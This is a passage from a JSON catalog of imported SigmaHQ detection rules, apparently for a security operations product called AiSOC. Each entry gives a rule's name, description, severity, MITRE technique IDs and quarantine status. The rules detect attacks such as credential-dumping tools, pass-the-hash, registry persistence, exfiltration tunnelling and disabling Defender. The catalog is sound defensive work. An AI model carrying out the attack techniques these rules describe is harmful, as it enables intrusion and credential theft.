"source_id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_whoami_parent_anomaly.yml" } }, { "id": "sigmahq-sigma-8de89e52-f6e1-4b5b-afd1-41ecfa300d48", "type": "detection", "name": "Suspicious WindowsTerminal Child Processes", "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-windowsterminal-child-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml" } }, { "id": "sigmahq-sigma-8dee7a0d-43fd-4b3c-8cd1-605e189d195e", "type": "detection", "name": "User State Changed From Guest To Member", "description": "Detects the change of user type from \"Guest\" to \"Member\" for potential elevation of privilege.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-state-changed-from-guest-to-member.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8dee7a0d-43fd-4b3c-8cd1-605e189d195e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_guest_to_member.yml" } }, { "id": "sigmahq-sigma-8e0bb260-d4b2-4fff-bb8d-3f82118e6892", "type": "detection", "name": "Potentially Suspicious CMD Shell Output Redirect", "description": "Detects inline Windows shell commands redirecting output via the \">\" symbol to a suspicious location.\nThis technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as \"hostname\" and \"dir\" to files for future exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-cmd-shell-output-redirect.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml" } }, { "id": "sigmahq-sigma-8e1cb247-6cf6-42fa-b440-3f27d57e9936", "type": "detection", "name": "Potential Persistence Via Microsoft Office Add-In", "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1137.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-microsoft-office-add-in.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_addin_persistence.yml" } }, { "id": "sigmahq-sigma-8e3c7994-131e-4ba5-b6ea-804d49113a26", "type": "detection", "name": "Uncommon Child Process Spawned By Odbcconf.EXE", "description": "Detects an uncommon child process of \"odbcconf.exe\" binary which normally shouldn't have any child processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-child-process-spawned-by-odbcconf-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8e3c7994-131e-4ba5-b6ea-804d49113a26", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml" } }, { "id": "sigmahq-sigma-8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", "type": "detection", "name": "Tap Driver Installation", "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tap-driver-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_tap_driver.yml" } }, { "id": "sigmahq-sigma-8e5c03fa-b7f0-11ea-b242-07e0576828d9", "type": "detection", "name": "Denied Access To Remote Desktop", "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/denied-access-to-remote-desktop.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_not_allowed_rdp_access.yml" } }, { "id": "sigmahq-sigma-8e95e73e-ba02-4a87-b4d7-0929b8053038", "type": "detection", "name": "Suspicious ArcSOC.exe Child Process", "description": "Detects script interpreters, command-line tools, and similar suspicious child processes of ArcSOC.exe.\nArcSOC.exe is the process name which hosts ArcGIS Server REST services. If an attacker compromises an ArcGIS\nServer system and uploads a malicious Server Object Extension (SOE), they can send crafted requests to the corresponding\nservice endpoint and remotely execute code from the ArcSOC.exe process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-arcsoc-exe-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8e95e73e-ba02-4a87-b4d7-0929b8053038", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_arcsoc_susp_child_process.yml" } }, { "id": "sigmahq-sigma-8ec2c8b4-557a-4121-b87c-5dfb3a602fae", "type": "detection", "name": "JexBoss Command Sequence", "description": "Detects suspicious command sequence that JexBoss", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/jexboss-command-sequence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8ec2c8b4-557a-4121-b87c-5dfb3a602fae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_susp_jexboss.yml" } }, { "id": "sigmahq-sigma-8eef149c-bd26-49f2-9e5a-9b00e3af499b", "type": "detection", "name": "Pass the Hash Activity 2", "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1550.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/pass-the-hash-activity-2.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_pass_the_hash_2.yml" } }, { "id": "sigmahq-sigma-8f02c935-effe-45b3-8fc9-ef8696a9e41d", "type": "detection", "name": "Non-privileged Usage of Reg or Powershell", "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/non-privileged-usage-of-reg-or-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml" } }, { "id": "sigmahq-sigma-8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", "type": "detection", "name": "Unusual File Deletion by Dns.exe", "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unusual-file-deletion-by-dns-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml" } }, { "id": "sigmahq-sigma-8f2a5c3d-9e4b-4a7c-8d1f-2e5a6b9c3d7e", "type": "detection", "name": "Suspicious Space Characters in TypedPaths Registry Path - FileFix", "description": "Detects the occurrence of numerous space characters in TypedPaths registry paths, which may indicate execution via phishing lures using file-fix techniques to hide malicious commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.004", "T1027.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-space-characters-in-typedpaths-registry-path-filefix.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8f2a5c3d-9e4b-4a7c-8d1f-2e5a6b9c3d7e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_typedpaths_space_characters.yml" } }, { "id": "sigmahq-sigma-8f3ab69a-aa22-4943-aa58-e0a52fdf6818", "type": "detection", "name": "User Shell Folders Registry Modification via CommandLine", "description": "Detects modifications to User Shell Folders registry values via reg.exe or PowerShell, which could indicate persistence attempts.\nAttackers may modify User Shell Folders registry values to point to malicious executables or scripts that will be executed during startup.\nThis technique is often used to maintain persistence on a compromised system by ensuring that malicious payloads are executed automatically.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-shell-folders-registry-modification-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8f3ab69a-aa22-4943-aa58-e0a52fdf6818", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_user_shell_folders_registry_modification.yml" } }, { "id": "sigmahq-sigma-8f668cc4-c18e-45fe-ad00-624a981cf88a", "type": "detection", "name": "Okta Application Sign-On Policy Modified or Deleted", "description": "Detects when an application Sign-on Policy is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-application-sign-on-policy-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8f668cc4-c18e-45fe-ad00-624a981cf88a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_application_sign_on_policy_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", "type": "detection", "name": "Java Running with Remote Debugging", "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/java-running-with-remote-debugging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_java_remote_debugging.yml" } }, { "id": "sigmahq-sigma-8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", "type": "detection", "name": "Potential Persistence Via MyComputer Registry Keys", "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-mycomputer-registry-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml" } }, { "id": "sigmahq-sigma-8fbf3271-1ef6-4e94-8210-03c2317947f6", "type": "detection", "name": "Cred Dump Tools Dropped Files", "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001", "T1003.002", "T1003.003", "T1003.004", "T1003.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cred-dump-tools-dropped-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml" } }, { "id": "sigmahq-sigma-8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "type": "detection", "name": "Suspicious PowerShell Invocations - Specific - PowerShell Module", "description": "Detects suspicious PowerShell invocation command parameters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-invocations-specific-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml" } }, { "id": "sigmahq-sigma-8ffc5407-52e3-478f-9596-0a7371eafe13", "type": "detection", "name": "Disable PUA Protection on Windows Defender", "description": "Detects disabling Windows Defender PUA protection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-pua-protection-on-windows-defender.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8ffc5407-52e3-478f-9596-0a7371eafe13", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml" } }, { "id": "sigmahq-sigma-90217a70-13fc-48e4-b3db-0d836c5824ac", "type": "detection", "name": "GAC DLL Loaded Via Office Applications", "description": "Detects any GAC DLL being loaded by an Office Product", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/gac-dll-loaded-via-office-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "90217a70-13fc-48e4-b3db-0d836c5824ac", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_office_dotnet_gac_dll_load.yml" } }, { "id": "sigmahq-sigma-902cedee-0398-4e3a-8183-6f3a89773a96", "type": "detection", "name": "Suspicious Invoke-Item From Mount-DiskImage", "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-invoke-item-from-mount-diskimage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "902cedee-0398-4e3a-8183-6f3a89773a96", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml" } }, { "id": "sigmahq-sigma-903076ff-f442-475a-b667-4f246bcc203b", "type": "detection", "name": "Nltest.EXE Execution", "description": "Detects nltest commands that can be used for information discovery", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1016", "T1018", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/nltest-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "903076ff-f442-475a-b667-4f246bcc203b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_nltest_execution.yml" } }, { "id": "sigmahq-sigma-904e8e61-8edf-4350-b59c-b905fc8e810c", "type": "detection", "name": "Security Software Discovery Via Powershell Script", "description": "Detects calls to \"get-process\" where the output is piped to a \"where-object\" filter to search for security solution processes.\nAdversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1518.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/security-software-discovery-via-powershell-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "904e8e61-8edf-4350-b59c-b905fc8e810c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_get_process_security_software_discovery.yml" } }, { "id": "sigmahq-sigma-9058ca8b-f397-4fd1-a9fa-2b7aad4d6309", "type": "detection", "name": "Okta Admin Functions Access Through Proxy", "description": "Detects access to Okta admin functions through proxy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-admin-functions-access-through-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9058ca8b-f397-4fd1-a9fa-2b7aad4d6309", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_admin_activity_from_proxy_query.yml" } }, { "id": "sigmahq-sigma-905d389b-b853-46d0-9d3d-dea0d3a3cd49", "type": "detection", "name": "AWS STS AssumeRole Misuse", "description": "Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1548", "T1550", "T1550.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-sts-assumerole-misuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "905d389b-b853-46d0-9d3d-dea0d3a3cd49", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_sts_assumerole_misuse.yml" } }, { "id": "sigmahq-sigma-9069ea3c-b213-4c52-be13-86506a227ab1", "type": "detection", "name": "Linux Crypto Mining Indicators", "description": "Detects command line parameters or strings often used by crypto miners", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1496" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-crypto-mining-indicators.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9069ea3c-b213-4c52-be13-86506a227ab1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml" } }, { "id": "sigmahq-sigma-9082ff1f-88ab-4678-a3cc-5bcff99fc74d", "type": "detection", "name": "HackTool - GMER Rootkit Detector and Remover Execution", "description": "Detects the execution GMER tool based on image and hash fields.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-gmer-rootkit-detector-and-remover-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_gmer.yml" } }, { "id": "sigmahq-sigma-908655e0-25cf-4ae1-b775-1c8ce9cf43d8", "type": "detection", "name": "Login to Disabled Account", "description": "Detect failed attempts to sign in to disabled accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/login-to-disabled-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "908655e0-25cf-4ae1-b775-1c8ce9cf43d8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_login_to_disabled_account.yml" } }, { "id": "sigmahq-sigma-90ae0469-0cee-4509-b67f-e5efcef040f7", "type": "detection", "name": "Aruba Network Service Potential DLL Sideloading", "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aruba-network-service-potential-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "90ae0469-0cee-4509-b67f-e5efcef040f7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml" } }, { "id": "sigmahq-sigma-90d50722-0483-4065-8e35-57efaadd354d", "type": "detection", "name": "Arbitrary MSI Download Via Devinit.EXE", "description": "Detects a certain command line flag combination used by \"devinit.exe\", which can be abused as a LOLBIN to download arbitrary MSI packages on a 